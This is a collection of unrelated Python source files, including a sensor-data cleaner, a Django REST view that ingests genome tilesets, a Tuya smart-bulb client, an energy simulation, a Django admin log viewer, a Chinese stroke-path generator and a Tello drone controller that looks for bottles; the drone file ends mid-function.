hf[col_name].resize((hf[col_name].shape[0]) + dataset.shape[0], axis = 0)
hf[col_name][-dataset.shape[0]:] = dataset
|
from c0101_retrieve_ref import retrieve_ref
from c0102_build_path import build_path
from c0103_save_meta import save_meta
from c0104_retrieve_meta import retrieve_meta
from c0105_record_to_summary import record_to_summary
import os
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
def clean_save():
"""
for each record
break the record into a PreStudy, Study, and PostStudy period
save each segment as a separate .csv
"""
print("begin clean_save")
study_list = retrieve_ref('study_list')
sensor_list = retrieve_ref('sensor_list')
segment_list = retrieve_ref('segment_list')
# check each study
for study in study_list:
df_meta = retrieve_meta(study)
recordNames = list(df_meta['recordName'])
for record in recordNames:
i = df_meta[ df_meta['recordName']== record].index.values[0]
print('i = ' + str(i))
for sensor in sensor_list:
format_type, segment = 'coregister', 'All'
source = os.path.join('studies', study, 'formatted', format_type, record, segment, sensor + '.csv')
df = pd.read_csv(source)
df = reset_minutes(segment, df)
for colName in list(df.head()):
if 'Unnamed' in colName:
del df[colName]
format_type = 'clean'
path = ['studies', study, 'formatted', format_type, record, segment]
path = build_path(path)
file = os.path.join(path, sensor + ".csv")
df.to_csv(file)
print('formatted clean file = ' + str(file))
def reset_minutes(segment, df):
"""
reset the minutes to be from 0
"""
segment_list = retrieve_ref('segment_list')
timePreStudy = retrieve_ref('timePreStudy')
timePostStudy = retrieve_ref('timePostStudy')
timeMinutes = []
timeMinutesOriginal = list(df['timeMinutes'])
for time in timeMinutesOriginal:
timeReset = time - timeMinutesOriginal[0]
timeMinutes.append(timeReset)
df['timeMinutes'] = timeMinutes
return(df)
|
from rest_framework.parsers import FormParser
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.permissions import IsAuthenticated
from django.http import HttpResponse
import subprocess
import re
import os
class Track(APIView):
permission_classes = (IsAuthenticated,)
parser_classes = [FormParser]
def post(self, request):
#print(request.data)
try:
uid = request.data['uid']
print(uid)
genome = request.data['genome']
print(genome)
# Check if formatted correctly
ID = re.split('[a-zA-Z.]+', uid)[0]# Match to number
suffix_array = re.split('^[0-9]+', uid)
suffix = ""
if suffix_array:
if suffix_array[1].lower() == 'minusstrand':
suffix = 'MinusStrand'
if suffix_array[1].lower() == 'plusstrand':
suffix = 'PlusStrand'
if suffix != "" and suffix != "MinusStrand" and suffix != "PlusStrand":
return Response("Invalid uid")
except:
return HttpResponse(400)
hostname = os.environ['MACHINE_HOSTNAME']
completed = subprocess.run(["python", "/home/higlass/projects/higlass-server/manage.py", "ingest_tileset", "--filename", uid + ".bw", "--no-upload", "--filetype", "bigwig", "--coordSystem", genome, "--uid", ID + suffix], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return Response(completed.stdout)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import json
import colorsys
from ._tuya_api import _TuyaApi
from .exceptions import ModeNotSupported, FunctionNotSupported, ArgumentError
class Bulb(_TuyaApi):
"""
Allows you to control the operation of your smart light bulb.
:param client_id: your client id
:param secret_key: your secret key
:param region_key: your region key. Example: cn; us; eu; in
:param device_id: your device id
"""
def __init__(
self, client_id: str, secret_key: str, region_key: str, device_id: str = None
):
super().__init__(
client_id=client_id, secret_key=secret_key, region_key=region_key
)
self._device_id = device_id
def _function_exists(self, code_name: str, device_id: str) -> bool:
"""
Check if a functions exists.
Use KeyError exception to catch error.
:param code_name: function name
:param device_id: device id
:raise FunctionNotSupported: if function not supported
:return: state
"""
functions = self.functions(device_id=device_id)
try:
state = [True for item in functions if code_name == item["code"]][0]
except (KeyError, IndexError):
raise FunctionNotSupported(target=code_name)
return state
def _available_values(self, code_name: str, device_id: str):
"""
Get all available values.
:param code_name: function name
:param device_id: device id
:return: value
"""
values = [
item["values"]
for item in self.functions(device_id=device_id)
if item["code"] == code_name
][0]
return values
def _template(
self,
value: int,
code_name: str,
device_id: str,
) -> dict:
"""
Brightness level for multi-version.
:param value:
:param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
:raise tuya_bulb_control.exceptions.ValueNotInRange: if the value is out of range
:return: response dict or bool
"""
device_id = self._check_device_id(device_id)
body = {"commands": [{"code": code_name, "value": value}]}
response = self._post(postfix=f"/devices/{device_id}/commands", body=body)
return response
def _check_device_id(self, device_id: str) -> str:
"""
Check device id.
:param device_id: device id
:return: current device id
:raise ArgumentError: if device_id is empty
"""
device_id = self._device_id if device_id is None else device_id
if not device_id:
raise ArgumentError(
target=device_id, msg="Argument device_id must not be empty."
)
return device_id
@staticmethod
def _make_body(code_name: str, value) -> dict:
"""
Template for requests.
:param code_name: code name
:param value: value
:return:
"""
body = {
"commands": [
{
"code": code_name,
"value": value,
}
]
}
return body
def set_work_mode(
self, mode_name: str, check: bool = True, device_id: str = None
) -> dict:
"""
Select work mode.
You can get a list of mods from tuya_bulb_control.Bulb.functions()
Uses code: work_mode
:param mode_name: mode name. For example: white; colour; scene; music
:param check: check if your device supports this mode.
Default: True == Always check. Set to False if you are sure the device supports the mode.
:param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
:raise KeyError: if the bulb doesn't support work mode
:raise tuya_bulb_control.exceptions.ModeNotExists: if work mode doesn't exist
:return: response dict
"""
code_name = "work_mode"
device_id = self._check_device_id(device_id)
if not check:
self._function_exists(code_name=code_name, device_id=device_id)
available_values = json.loads(
self._available_values(code_name=code_name, device_id=device_id)
)["range"]
if not [item for item in available_values if item == mode_name]:
raise ModeNotSupported(target=mode_name)
body = self._make_body(code_name=code_name, value=mode_name)
response = self._post(f"/devices/{device_id}/commands", body=body)
return response
def set_colour(self, rgb: tuple, check: bool = None, device_id: str = None) -> dict:
"""
Colour mode settings.
Uses code: colour_data
:param rgb: rgb coordinates
:param check: check if your device supports this mode.
Default: True == Always check. Set to False if you are sure the device supports the mode.
:param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
:raise tuya_bulb_control.exceptions.ValueNotInRange: if the value is out of range
:return: response dict
"""
code_name = "colour_data"
device_id = self._check_device_id(device_id)
if not check:
self._function_exists(code_name=code_name, device_id=device_id)
h, s, v = colorsys.rgb_to_hsv(rgb[0] / 255, rgb[1] / 255, rgb[2] / 255)
body = self._make_body(code_name, {"h": h * 360, "s": s * 255, "v": v * 255})
response = self._post(postfix=f"/devices/{device_id}/commands", body=body)
return response
def set_colour_v2(
self, rgb: tuple, check: bool = None, device_id: str = None
) -> dict:
"""
Colour mode settings.
Uses code: colour_data_v2
:param rgb: rgb coordinates
:param check: check if your device supports this mode.
Default: True == Always check. Set to False if you are sure the device supports the mode.
:param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
:raise tuya_bulb_control.exceptions.ValueNotInRange: if the value is out of range
:return: response dict
"""
code_name = "colour_data_v2"
device_id = self._check_device_id(device_id)
if not check:
self._function_exists(code_name=code_name, device_id=device_id)
h, s, v = colorsys.rgb_to_hsv(rgb[0] / 255, rgb[1] / 255, rgb[2] / 255)
body = self._make_body(
code_name=code_name, value={"h": h * 360, "s": s * 1000, "v": v * 1000}
)
response = self._post(postfix=f"/devices/{device_id}/commands", body=body)
return response
def set_toggle(
self, state: bool = None, check: bool = True, device_id: str = None
) -> dict:
"""
Turn ON or OFF the bulb.
Uses code: switch_led
:param state: explicit status indication
:param check: check if your device supports this mode.
Default: True == Always check. Set to False if you are sure the device supports the mode.
:param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
:return: response dict
"""
code_name = "switch_led"
device_id = self._check_device_id(device_id)
if check:
self._function_exists(code_name=code_name, device_id=device_id)
if state is None:
state = not self.current_value(code_name=code_name, device_id=device_id)
body = self._make_body(code_name=code_name, value=state)
response = self._post(postfix=f"/devices/{device_id}/commands", body=body)
return response
def set_toggle_timer(
self, value: int, check: bool = None, device_id: str = None
) -> dict:
"""
On or Off this device by timer.
Uses code: countdown_1
:param value: minutes. From 0-1440 (24 hours). To cancel the timer, pass value=0
:param check: check if your device supports this mode.
Default: True == Always check. Set to False if you are sure the device supports the mode.
:param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
:raise tuya_bulb_control.exceptions.ValueNotInRange: if the value is out of range
:return: response dict or bool
"""
code_name = "countdown_1"
device_id = self._check_device_id(device_id)
if value > 1440:
raise ValueError(f"{code_name} -> The value must be between 0-1440")
if not check:
self._function_exists(code_name=code_name, device_id=device_id)
value = value * 60 # To seconds
body = self._make_body(code_name=code_name, value=value)
response = self._post(postfix=f"/devices/{device_id}/commands", body=body)
return response
def turn_on(self, check: bool = True, device_id: str = None) -> dict:
"""
Turn ON the bulb.
Uses code: switch_led
:param check: check if your device supports this mode.
Default: True == Always check. Set to False if you are sure the device supports the mode.
:param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
:return: response status dict
"""
device_id = self._check_device_id(device_id)
response = self.set_toggle(state=True, check=check, device_id=device_id)
return response
def turn_off(self, check: bool = True, device_id: str = None) -> dict:
"""
Turn OFF the bulb.
Uses code: switch_led
:param check: check if your device supports this mode.
Default: True == Always check. Set to False if you are sure the device supports the mode.
:param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
:return: response status dict
"""
device_id = self._check_device_id(device_id)
response = self.set_toggle(state=False, check=check, device_id=device_id)
return response
def set_colour_temp(
self, value: int, check: bool = None, device_id: str = None
) -> dict:
"""
Colour temperature.
Uses code: temp_value
:param value: percentage from 25-255. For example: 25 = warm or 255 = cold
:param check: check if your device supports this mode.
Default: True == Always check. Set to False if you are sure the device supports the mode.
:param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
:raise tuya_bulb_control.exceptions.ValueNotInRange: if the value is out of range
:return: response dict or bool
"""
code_name = "temp_value"
if value < 25 or value > 255:
raise ValueError(f"{value} -> The value not in rage 25-255")
if not check:
self._function_exists(code_name=code_name, device_id=device_id)
response = self._template(value=value, code_name=code_name, device_id=device_id)
return response
def set_colour_temp_v2(
self, value: int, check: bool = None, device_id: str = None
) -> dict:
"""
Colour temperature.
Uses code: temp_value_v2
:param value: percentage from 0-100. For example: 0 = warm or 100 = cold
:param check: check if your device supports this mode.
Default: True == Always check. Set to False if you are sure the device supports the mode.
:param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
:raise tuya_bulb_control.exceptions.ValueNotInRange: if the value is out of range
:return: response dict or bool
"""
code_name = "temp_value_v2"
if value < 0 or value > 100:
raise ValueError(f"{value} -> The value not in rage 0-100")
if not check:
self._function_exists(code_name=code_name, device_id=device_id)
response = self._template(
value=value * 10, code_name=code_name, device_id=device_id
)
return response
def set_bright(self, value: int, check: bool = None, device_id: str = None) -> dict:
"""
Brightness level.
Uses code: bright_value
:param value: percentage from 25-255
:param check: check if your device supports this mode.
Default: True == Always check. Set to False if you are sure the device supports the mode.
:param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
:raise tuya_bulb_control.exceptions.ValueNotInRange: if the value is out of range
:return: response dict or bool
"""
code_name = "bright_value"
if value < 25 or value > 255:
raise ValueError(f"{value} -> The value not in rage 25-255")
if not check:
self._function_exists(code_name=code_name, device_id=device_id)
response = self._template(value=value, code_name=code_name, device_id=device_id)
return response
def set_bright_v2(
self, value: int, check: bool = None, device_id: str = None
) -> dict:
"""
Brightness level. v2 only.
Uses code: bright_value_v2
:param value: percentage from 1-100
:param check: check if your device supports this mode.
Default: True == Always check. Set to False if you are sure the device supports the mode.
:param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
:raise tuya_bulb_control.exceptions.ValueNotInRange: if the value is out of range
:return: response dict or bool
"""
code_name = "bright_value_v2"
if value < 1 or value > 100:
raise ValueError(f"{value} -> The value not in rage 1-100")
if not check:
self._function_exists(code_name=code_name, device_id=device_id)
response = self._template(
value=value * 10, code_name=code_name, device_id=device_id
)
return response
def state(self, device_id: str = None) -> dict:
"""
Get all current state of the bulb.
:param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
:return: response status dict
"""
device_id = self._check_device_id(device_id)
response = self._get(postfix=f"/devices/{device_id}/status")["result"]
return response
def functions(self, device_id: str = None) -> dict:
"""
Get all available functions for this bulb.
:param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
:return: response functions dict
"""
device_id = self._check_device_id(device_id)
response = self._get(f"/devices/{device_id}/functions")["result"]["functions"]
return response
def current_value(self, code_name: str, device_id: str = None):
"""
Get value the selected function.
:param code_name: name to find
:param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
:return: value
"""
try:
value = [
item["value"]
for item in self.state(device_id)
if item["code"] == code_name
][0]
except (IndexError, KeyError):
raise FunctionNotSupported(target=code_name)
return value
|
from direct.directnotify import DirectNotifyGlobal
from direct.distributed.DistributedObjectAI import DistributedObjectAI
class DistributedPhaseEventMgrAI(DistributedObjectAI):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedPhaseEventMgrAI')
|
from ApplianceOwner import ApplianceOwner
from ApplianceOwner import HouseHold
import numpy
class Community():
def __init__(self,number_of_households,mean_residents,sd_residents):
self.number_of_households: int = number_of_households
self.mean_residents: float = mean_residents
self.sd_residents: float = sd_residents
self.household_list: ApplianceOwner = []
self.logging: bool = False
self.solar_panel_status = False
#Not sure if this is technically an accessor method or more like a toString() method from java, had to make a call.
def getSummary(self) -> str:
summary = "--- Summary of community ---\n"
summary += "Households: " + str(len(self.household_list)) + "\n"
summary += "*** Summary of Households *** \n"
for i in range(len(self.household_list)):
summary += self.household_list[i].getSummary(i) + "\n"
summary += "### End of community summary ###\n"
return summary
def setLogging(self,logging: bool):
self.logging = logging
#Printing out statements can take a long time, especially if it's being done in a for loop, within a for loop, within a for loop and so on. Checking a boolean statment is much quicker
#This also allows me to turn logging off and on without having to go through all my code and commeting out the logging statments
#Also, this isn't technically being logged, just printed, but you get the point
def setSolarPanelStatus(self, status: bool):
self.solar_panel_status = status
def createHouseHolds(self):
for i in range(self.number_of_households):
#https://docs.scipy.org/doc/numpy-1.15.1/reference/generated/numpy.random.randn.html
num_residents = int(numpy.random.randn() * self.sd_residents + self.mean_residents) #https://www.science-emergence.com/Articles/Create-random-numbers-from-a-normal-distribution-with-numpy-in-python-/
if num_residents < 1: #A household cannot have less than 1 resident. This kind of breaks the normal distribution, but I think that's okay.
num_residents = 1 #I don't think the number of people per household is a normal distribution anyway, but that is beyond the scope of this unit.
house_hold = HouseHold(num_residents)
house_hold.setLogging(self.logging)
house_hold.setSolarPanelStatus(self.solar_panel_status)
house_hold.createResidents()
house_hold.createAppliances(2)
self.household_list.append(house_hold)
if self.logging:
print("\t[Notice]: Created a household with " + str(num_residents) + " resident(s)")
if self.logging:
print("[Notice]: Created community with " + str(self.number_of_households) + " households")
def tickEnergy(self,hour_of_day: int) -> float:
print("----------For hour: " + str(hour_of_day) + " ------------------")
sum_of_energy = 0.0
for i in self.household_list:
sum_of_energy += i.tickEnergy(hour_of_day)
print("Community: " + " consumed: " + str(sum_of_energy/3600000) + " kWh at: " + str(hour_of_day))
print("_____________________________")
print()
return sum_of_energy
# def simulateDailyEnergyUse(self): #In Joules
# #TODO: Reset On_Grid
# energy_list = []
# for i in range(24):
# energy_used_this_hour = self.tickEnergy(i)
# energy_list.append(energy_used_this_hour)
# return energy_list
# def simulateDailyEnergyUsekWh(self) -> float:
# energy_list = self.simulateDailyEnergyUse()
# for i in energy_list:
# i = i/36000000.0 #Converstion scalar for Joules to kWh
# return energy_list
#community = Community(2,3.2,1.5)
#community.setLogging(False)
#community.createHouseHolds()
#print(community.getSummary())
#print(str(community.tickEnergy(5)/1000/1000)) |
from __future__ import unicode_literals
from django.contrib import admin
from django.contrib.admin.models import LogEntry, ADDITION, CHANGE, DELETION
from django.utils.html import escape
from django.core.urlresolvers import reverse, NoReverseMatch
from django.contrib.auth.models import User
action_names = {
ADDITION: 'Addition',
CHANGE: 'Change',
DELETION: 'Deletion',
}
class FilterBase(admin.SimpleListFilter):
def queryset(self, request, queryset):
if self.value():
dictionary = dict(((self.parameter_name, self.value()),))
return queryset.filter(**dictionary)
class ActionFilter(FilterBase):
title = 'action'
parameter_name = 'action_flag'
def lookups(self, request, model_admin):
return action_names.items()
class UserFilter(FilterBase):
"""Use this filter to only show current users, who appear in the log."""
title = 'user'
parameter_name = 'user_id'
def lookups(self, request, model_admin):
return tuple((u.id, u.username)
for u in User.objects.filter(pk__in =
LogEntry.objects.values_list('user_id').distinct())
)
class AdminFilter(UserFilter):
"""Use this filter to only show current Superusers."""
title = 'admin'
def lookups(self, request, model_admin):
return tuple((u.id, u.username) for u in User.objects.filter(is_superuser=True))
class StaffFilter(UserFilter):
"""Use this filter to only show current Staff members."""
title = 'staff'
def lookups(self, request, model_admin):
return tuple((u.id, u.username) for u in User.objects.filter(is_staff=True))
class LogEntryAdmin(admin.ModelAdmin):
date_hierarchy = 'action_time'
readonly_fields = LogEntry._meta.get_all_field_names()
list_filter = [
UserFilter,
ActionFilter,
'content_type',
# 'user',
]
search_fields = [
'object_repr',
'change_message'
]
list_display = [
'action_time',
'user',
'content_type',
'object_link',
'action_flag',
'action_description',
'change_message',
]
def has_add_permission(self, request):
return False
def has_change_permission(self, request, obj=None):
return request.user.is_superuser and request.method != 'POST'
def has_delete_permission(self, request, obj=None):
return False
def object_link(self, obj):
ct = obj.content_type
repr_ = escape(obj.object_repr)
try:
href = reverse('admin:%s_%s_change' % (ct.app_label, ct.model), args=[obj.object_id])
link = u'<a href="%s">%s</a>' % (href, repr_)
except NoReverseMatch:
link = repr_
return link if obj.action_flag != DELETION else repr_
object_link.allow_tags = True
object_link.admin_order_field = 'object_repr'
object_link.short_description = u'object'
def queryset(self, request):
return super(LogEntryAdmin, self).queryset(request) \
.prefetch_related('content_type')
def action_description(self, obj):
return action_names[obj.action_flag]
action_description.short_description = 'Action'
admin.site.register(LogEntry, LogEntryAdmin) |
from .stroke import Stroke, StrokePosition
from .component import Component, ComponentInfo
from .stroke_path import *
from .shape import Pane
class StrokeSpec:
def __init__(self, typeName, parameters = None, segments = None,
splinePointsList = None):
self.typeName = typeName
self.parameters = parameters
self.segments = segments
if splinePointsList:
lastEndPoint = (0, 0)
relativeControlPointsList = []
for points in splinePointsList:
newPoints = [(point[0] - lastEndPoint[0], point[1] - lastEndPoint[1]) for point in points]
relativeControlPointsList.append(newPoints)
lastEndPoint = points[-1]
self.relativeControlPointsList = relativeControlPointsList
self.absoluteControlPointsList = splinePointsList
else:
self.relativeControlPointsList = None
self.absoluteControlPointsList = None
def isBySegments(self):
return (self.segments != None)
def isByControlPoints(self):
return (self.relativeControlPointsList != None)
class StrokeFactory:
def __init__(self):
from .segment import SegmentFactory
segmentFactory = SegmentFactory()
self.segmentFactory = segmentFactory
self.strokePathMap = {
"點": StrokePathGenerator_點(segmentFactory),
# "長頓點": StrokePathGenerator_點(segmentFactory),
"圈": StrokePathGenerator_圈(segmentFactory),
"橫": StrokePathGenerator_橫(segmentFactory),
"橫鉤": StrokePathGenerator_橫鉤(segmentFactory),
"橫折": StrokePathGenerator_橫折(segmentFactory),
"橫折折": StrokePathGenerator_橫折折(segmentFactory),
"橫折提": StrokePathGenerator_橫折提(segmentFactory),
"橫折折撇": StrokePathGenerator_橫折折撇(segmentFactory),
"橫折鉤": StrokePathGenerator_橫折鉤(segmentFactory),
"橫折彎": StrokePathGenerator_橫折彎(segmentFactory),
"橫撇": StrokePathGenerator_橫撇(segmentFactory),
"橫斜彎鉤": StrokePathGenerator_橫斜彎鉤(segmentFactory),
"橫折折折鉤": StrokePathGenerator_橫折折折鉤(segmentFactory),
"橫斜鉤": StrokePathGenerator_橫斜鉤(segmentFactory),
"橫折折折": StrokePathGenerator_橫折折折(segmentFactory),
"豎": StrokePathGenerator_豎(segmentFactory),
"豎折": StrokePathGenerator_豎折(segmentFactory),
"豎彎左": StrokePathGenerator_豎彎左(segmentFactory),
"豎提": StrokePathGenerator_豎提(segmentFactory),
"豎折折": StrokePathGenerator_豎折折(segmentFactory),
"豎折彎鉤": StrokePathGenerator_豎折彎鉤(segmentFactory),
"豎彎鉤": StrokePathGenerator_豎彎鉤(segmentFactory),
"豎彎": StrokePathGenerator_豎彎(segmentFactory),
"豎鉤": StrokePathGenerator_豎鉤(segmentFactory),
"扁斜鉤": StrokePathGenerator_豎彎鉤(segmentFactory),
"斜鉤": StrokePathGenerator_斜鉤(segmentFactory),
"彎鉤": StrokePathGenerator_彎鉤(segmentFactory),
"撇鉤": StrokePathGenerator_撇鉤(segmentFactory),
"撇": StrokePathGenerator_撇(segmentFactory),
"撇點": StrokePathGenerator_撇點(segmentFactory),
"撇橫": StrokePathGenerator_撇橫(segmentFactory),
"撇提": StrokePathGenerator_撇橫(segmentFactory),
"撇折": StrokePathGenerator_撇橫(segmentFactory),
"撇橫撇": StrokePathGenerator_撇橫撇(segmentFactory),
"豎撇": StrokePathGenerator_豎撇(segmentFactory),
"提": StrokePathGenerator_提(segmentFactory),
"捺": StrokePathGenerator_捺(segmentFactory),
"臥捺": StrokePathGenerator_臥捺(segmentFactory),
"提捺": StrokePathGenerator_提捺(segmentFactory),
"橫捺": StrokePathGenerator_橫捺(segmentFactory),
"橫撇彎鉤": StrokePathGenerator_橫撇彎鉤(segmentFactory),
"豎彎折": StrokePathGenerator_豎彎折(segmentFactory),
}
# StrokePath
def generateStrokePathBySpec(self, spec: StrokeSpec):
if spec.isBySegments():
segments = spec.segments
strokePath = StrokePath(segments)
elif spec.isByControlPoints():
segmentFactory = self.segmentFactory
# Start at (0, 0)
# Format:
# [
# [(x, y)],
# [(x, y), (x,y)],
# ]
controlPointsList = spec.relativeControlPointsList
segments = []
controlPoint = None
for points in controlPointsList:
segmentCount = len(points)
if segmentCount == 2:
# 二次貝茲曲線
segment = segmentFactory.generateSegment_QCurve(points[0], points[1])
elif segmentCount == 1:
# 一次貝茲曲線、線性
segment = segmentFactory.generateSegment_Beeline(points[0])
else:
assert False
segments.append(segment)
strokePath = StrokePath(segments)
else:
strokeTypeName = spec.typeName
parameters = spec.parameters
strokePathGenerator = self.strokePathMap.get(strokeTypeName, None)
assert strokePathGenerator!=None
strokePath = strokePathGenerator.generate(parameters)
return strokePath
# Stroke
def _generateStroke(self, name, strokePath, strokeBoundPane):
infoPane = strokePath.pane
startPoint = infoPane.transformRelativePointByTargetPane((0, 0), strokeBoundPane)
strokePosition = StrokePosition(startPoint, strokeBoundPane)
return Stroke(name, strokePath, strokePosition)
def generateStrokeBySpec(self, spec: StrokeSpec, startPoint = None, strokeBoundPane = None):
strokeTypeName = spec.typeName
strokePath = self.generateStrokePathBySpec(spec)
if spec.isBySegments():
boundary = strokePath.computeBoundaryWithStartPoint(startPoint)
pane = Pane(*boundary)
return self._generateStroke(strokeTypeName, strokePath, pane)
else:
assert startPoint != None or strokeBoundPane != None
if startPoint:
boundary = strokePath.computeBoundaryWithStartPoint(startPoint)
strokeBoundPane = Pane(*boundary)
else:
infoPane = strokePath.pane
startPoint = infoPane.transformRelativePointByTargetPane((0, 0), strokeBoundPane)
return self._generateStroke(strokeTypeName, strokePath, strokeBoundPane)
class ComponentFactory:
def __init__(self):
pass
def _generateComponent(self, strokes, pane = None):
componentInfo = ComponentInfo(strokes)
if not pane:
pane = componentInfo.getInfoPane()
return Component(componentInfo, pane)
def generateComponentByStrokes(self, strokes):
return self._generateComponent(strokes)
def generateComponentByComponentPane(self, component, pane):
componentStrokes = component.getStrokeList()
componentStatePane = component.getStatePane()
strokes = [s.transform(componentStatePane, pane) for s in componentStrokes]
return self._generateComponent(strokes)
def generateComponentByComponentPanePairs(self, componentPanePairs):
from .shape import mergePanes
strokes = []
for component, pane in componentPanePairs:
component=self.generateComponentByComponentPane(component, pane)
strokes.extend(component.getStrokeList())
panes = [stroke.getStatePane() for stroke in strokes]
pane = mergePanes(panes)
return self._generateComponent(strokes, pane)
|
import socket
import threading
import time
import cv2
from easytello.stats import Stats
from functools import wraps
from playsound import playsound
import detect
import navigate
class Tello:
def __init__(self, tello_ip: str='192.168.10.1', debug: bool=True):
# Opening local UDP port on 8889 for Tello communication
self.local_ip = ''
self.local_port = 8889
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.bind((self.local_ip, self.local_port))
# Setting Tello ip and port info
self.tello_ip = tello_ip
self.tello_port = 8889
self.tello_address = (self.tello_ip, self.tello_port)
self.log = []
# Intializing response thread
self.receive_thread = threading.Thread(target=self._receive_thread)
self.receive_thread.daemon = True
self.receive_thread.start()
# easyTello runtime options
self.stream_state = False
self.MAX_TIME_OUT = 15.0
self.debug = debug
# Setting Tello to command mode
self.command()
# When set to True, the photo will be saved and model will be notified
self.send_photo = False
# Storing the whole history of positions
self.up_down = [0]
self.forward_backward = [0]
self.right_left = [0]
self.clockwise_angle = [0]
# Storing the histoyry of commands with their values
self.command_history = []
# Storing the things that can be seen from certain coordinates
self.objects_to_be_seen = {}
# Sending infinite ping to the battery, to keep the connection keep_alive_thread # Intializing response thread
self.receive_thread = threading.Thread(target=self.battery_ping)
self.receive_thread.daemon = True
self.receive_thread.start()
self.found = False
def battery_ping(self, debug=False):
# _f = str(inspect.stack()[0][3])
while True:
time.sleep(5)
# if debug:
# print(f"{_f}: sent ping")
# if command(b'battery?', debug=debug) is not None:
# break
print("contacting battery")
capacity = self.get_battery()
print(str(capacity) + "%")
# trying to apply a decorator, but solved by calling signal_to_make_photo at the end
# @make_photo
def send_command(self, command: str, query: bool=False, make_photo: bool=False):
# New log entry created for the outbound command
self.log.append(Stats(command, len(self.log)))
# Sending command to Tello
self.socket.sendto(command.encode('utf-8'), self.tello_address)
# Displaying conformation message (if 'debug' os True)
if self.debug is True:
print('Sending command: {}'.format(command))
# Checking whether the command has timed out or not (based on value in 'MAX_TIME_OUT')
start = time.time()
while not self.log[-1].got_response(): # Runs while no repsonse has been received in log
now = time.time()
difference = now - start
if difference > self.MAX_TIME_OUT:
print('Connection timed out!')
break
# Prints out Tello response (if 'debug' is True)
if self.debug is True and query is False:
print('Response: {}'.format(self.log[-1].get_response()))
# At the end of each command, wait a little bit and take a photo
# TODO: decide, whether time.sleep() is even necessary
if make_photo:
time.sleep(1)
self.signal_to_make_photo()
def _receive_thread(self):
while True:
# Checking for Tello response, throws socket error
try:
self.response, ip = self.socket.recvfrom(1024)
self.log[-1].add_response(self.response)
except socket.error as exc:
print('Socket error: {}'.format(exc))
def _video_thread(self):
# Creating stream capture object
cap = cv2.VideoCapture('udp://'+self.tello_ip+':11111')
# Runs while 'stream_state' is True
while self.stream_state:
try:
ret, frame = cap.read()
cv2.imshow('DJI Tello', frame)
# Video Stream is closed if escape key is pressed
k = cv2.waitKey(1) & 0xFF
if k == 27:
break
# Used for testing purposes when in person mode
if k == 13: # key "enter"
print("Enter pressed")
self.signal_to_make_photo()
# Ready to respond for the need of photo
if self.send_photo:
self.send_photo = False
print("Automatic photo")
file_name = self.save_photo(frame)
is_there_a_bottle = self.contact_model(file_name)
except cv2.error as err:
print("CV ERROR ENCOUNTERED")
print(err)
cap.release()
cv2.destroyAllWindows()
# Decorators are not possible to make in classes (or nor very useful)
# Theoretically I can call self.make_photo(original_function), instead of decorating it
def make_photo(self, orig_func):
@wraps(orig_func)
def wrapper(*args, **kwargs):
result = orig_func(*args, **kwargs)
time.sleep(1)
self.signal_to_make_photo()
return result
return wrapper
def signal_to_make_photo(self):
"""
Sends signal to save a photo
"""
print_with_time("signal_to_make_photo")
self.send_photo = True
def save_photo(self, frame):
"""
Saves a photo on the harddrive
"""
print_with_time("save_photo")
timestamp = time.time()
file_name = "photo_{}.png".format(timestamp)
cv2.imwrite(file_name, frame)
return file_name
def contact_model(self, file_name):
"""
Calls the model to analyze the photo. Stores the objects it finds in a
local dictionary.
Returns a boolean whether the bottle was located
"""
print_with_time("contact_model")
response = detect.detect_image_from_path(file_name)
current_positon = self.get_current_position_string()
self.objects_to_be_seen[current_positon] = response
is_there_a_bottle = False
for obj in response:
if obj["name"] == "bottle":
is_there_a_bottle = True
print("BOTTLE THERE!")
playsound('Hlas 001.mp3')
break
print("is_there_a_bottle", is_there_a_bottle)
if is_there_a_bottle:
for obj in response:
if obj["name"] == "person":
is_there_a_bottle = True
print("ALCOHOLIC THERE!")
playsound('Hlas 003.mp3')
break
# Drawing a rectangle around the object
img = cv2.imread(file_name)
x_pixels_dron = 960
y_pixels_dron = 720
x_pixels_model = 416
y_pixels_model = 416
x_ratio = x_pixels_dron / x_pixels_model
y_ratio = y_pixels_dron / y_pixels_model
print("rectangle")
for obj in response:
print(obj)
x1 = int(obj["x1"] * x_ratio)
x2 = int(obj["x2"] * x_ratio)
y1 = int(obj["y1"] * y_ratio)
y2 = int(obj["y2"] * y_ratio)
area = abs(x1 - x2) * abs(y1 - y2)
print(area)
start = (x1, y1)
end = (x2, y2)
print("start", start)
print("end", end)
# Green colour by default
colour = (0, 255, 0)
# Red colour, if the object is
# WARNING: for some reason it is not RGB, but BGR
if obj["name"] == "bottle":
colour = (0, 0, 255)
# Let laptop be BLUE
elif obj["name"] == "laptop":
colour = (255, 0, 0)
cv2.rectangle(img, start, end, colour, 3)
cv2.imwrite(file_name[:-4] + "_rectangled.png", img)
print(response)
# Speaking with the agent, who tells us what to do next to approach a bottle
found_mode = False
is_lost = False
for i, d in enumerate(response):
# Followign a bottle!!!!!
if d["name"] == "bottle":
found_mode = True
angle, height, forward = navigate.analyze_scene(d)
no_change = angle == 0 and height == 0 and forward == 0
print("{} {}: angle {} height {} forward {}".format(d['name'], i, angle, height, forward))
command = ""
if angle > 0:
command = "cw {}".format(20)
elif angle < 0:
command = "ccw {}".format(20)
elif forward > 0:
command = "forward {}".format(40)
self.found = True
break
